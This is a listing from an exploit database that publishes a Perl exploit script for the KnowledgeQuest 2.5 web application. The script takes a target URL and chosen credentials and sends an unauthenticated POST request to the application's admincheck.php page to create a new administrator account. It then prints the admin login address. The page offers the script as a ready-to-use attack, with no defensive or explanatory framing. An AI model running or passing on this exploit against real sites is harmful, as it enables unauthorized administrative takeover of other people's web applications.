[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

KnowledgeQuest 2.5 Arbitrary Add Admin Exploit

Author
t0pP8uZz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2858
Category
web applications
Date add
08-04-2008
Platform
unsorted
==============================================
KnowledgeQuest 2.5 Arbitrary Add Admin Exploit
==============================================




#!/usr/bin/perl

use strict;
use LWP::UserAgent;

print "-+------------------------------------------+-\n";
print "-+- KnowledgeQuest 2.5 Arbitrary Add Admin -+-\n";
print "-+------------------------------------------+-\n";
print "-+-     Discovered && Coded By t0pP8uzz    -+-\n";
print "-+-  This Exploit will craft a evilpacket  -+-\n";
print "-+-     which will add a admin account     -+-\n";
print "-+------------------------------------------+-\n";

print "Enter URL: ";
	chomp(my $url=<STDIN>);
	
print "Enter Username (you will login with this): ";
	chomp(my $usr=<STDIN>);

print "Enter Password (you will login with this): ";
	chomp(my $pwd=<STDIN>);

my $ua  = LWP::UserAgent->new( agent=> 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)' );
my $res = $ua->post( $url."/admincheck.php", {'username' => $usr, 'password' => $pwd, 'repas' => $pwd} );

if($res->is_success) {

	if($res->content =~ /taken by another user/i) { print "\n\nExploit Failed! Reason: username already taken!"; exit; }
	
	print "\n\nExploit Success! Login to ".$url."administratorlogin.php with username: ".$usr." and password: ".$pwd."\n";
}




#  0day.today [2024-12-26]  #